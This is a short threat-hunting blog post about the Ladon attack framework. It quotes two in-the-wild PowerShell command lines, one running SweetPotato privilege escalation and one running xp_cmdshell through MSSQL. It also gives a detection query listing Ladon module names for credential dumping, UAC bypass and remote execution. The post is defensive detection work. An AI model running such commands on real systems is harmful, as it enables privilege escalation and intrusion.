179. Hunting for Ladon
Hello everyone!
Today we'll talk about a framework, which is quite popular among Chinese-speaking threat actors. It's called Ladon and can be used by adversary to solve various tasks: scanning, exploitation, remote execution, etc.
It's used in-the-wild. Here're some procedure examples as seen in this report:
powershell -exec bypass Import-Module .\Ladon.ps1;Ladon SweetPotato whoami
powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd [IP] [User] [Password] master xp_cmdshell “net user”
So, if a threat actor uses it on a compromised system, you see LOTS of interesting command line arguments, and we can use it for detection and hunting:
event_type: ("processcreatewin" OR "processcreatemac" OR "processcreatenix") AND cmdline: ("ladon" OR "ms17010" OR "bypassedr" OR "whatcms" OR "draytekpoc" OR "debase64" OR "smbghost" OR "enummssql" OR "enumshare" OR "ldapinfo" OR "ftpinfo" OR "smbscan" OR "wmiscan" OR "ldapscan" OR "winrmscan" OR "smbhashscan" OR "wmihashscan" OR "sshscan" OR "mssqlscan" OR "oraclescan" OR "weblogicscan" OR "vncscan" OR "ftpscan" OR "tomcatscan" OR "httpbasicscan" OR "nbtscan" OR "winrmscan" OR "dvrscan" OR "weblogicpoc" OR "phpstudypoc" OR "activemqpoc" OR "tomcatpoc" OR "struts2poc" OR "weblogicexp" OR "tomcatexp" OR "zerologon" OR "ftpsniffer" OR "httpsniffer" OR "iispwd" OR "wifipwd" OR "filezillapwd" OR "dumplsass" OR "wmiexec" OR "smbexec" OR "atexec" OR "sshexec" OR "jspshell" OR "webshell" OR "winrmexec" OR "bypassuac" OR "printnightmare" OR "spoolfool" OR "ms16135" OR "badpotato" OR "sweetpotato" OR "efspotato" OR "powercat" OR "regauto" OR "rdphijack" OR "logdeltomcat" OR "printerpoc" OR "xshellpwd" OR "msnswitchpwd" OR "netgearpwd" OR "joomlapwd" OR "godpotato" OR "hikvisionpoc" OR "bypassav" OR "mcppotato" OR "rubeus" OR "sharpgpoabuse" OR "mmcexec" OR "shellbrowserexec" OR "pvefindaduser")
See you tomorrow!
Comments
Post a Comment